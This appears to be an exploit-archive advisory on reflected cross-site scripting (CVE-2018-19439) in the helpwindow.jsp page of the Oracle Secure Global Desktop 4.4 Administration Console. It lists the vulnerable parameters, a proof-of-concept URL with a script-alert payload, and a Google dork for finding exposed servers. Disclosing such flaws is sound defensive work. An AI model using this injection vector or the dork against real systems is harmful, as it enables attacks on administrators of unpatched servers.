Oracle Secure Global Desktop Administration Console 4.4 Cross Site Scripting

2018.11.26
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79

<!-- # Exploit Title: Cross Site Scripting in Oracle Secure Global Desktop Administration Console - 4.4; Build: 20080807152602 # Date: 22-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.oracle.com/ # Software Link: http://www.oracle.com/ # Version: Oracle Secure Global Desktop Administration Console - 4.4; Build: 20080807152602 # Tested on: all # CVE : CVE-2018-19439 # Category: webapps 1. Description Cross Site Scripting exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602. The page "helpwindow.jsp" has reflected XSS via all parameters. 2. Proof of Concept http://X.X.X.X/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelp Window></TITLE></HEAD><body><script>alert("XSS")</script><!--& > helpFile=concepts.html&pageTitle=Administrator Help&mastheadUrl=/images/productNameSecondaryMasthead.png&mastheadDescription=Sun Secure Global Desktop Administration&jspPath=/sgdadmin/faces/com_sun_web_ui/help/&mastheadHeight=40&mastheadWidth=20 Vulnerables parameters: windowTitle, helpFile, pageTitle, mastheadUrl, mastheadDescription, jspPath, mastheadHeight and mastheadWidth. Google dorks: inurl:"/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp" 3. Solution: Update to the latests version Oracle Secure Global Desktop Administration Console 5.4. -->


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top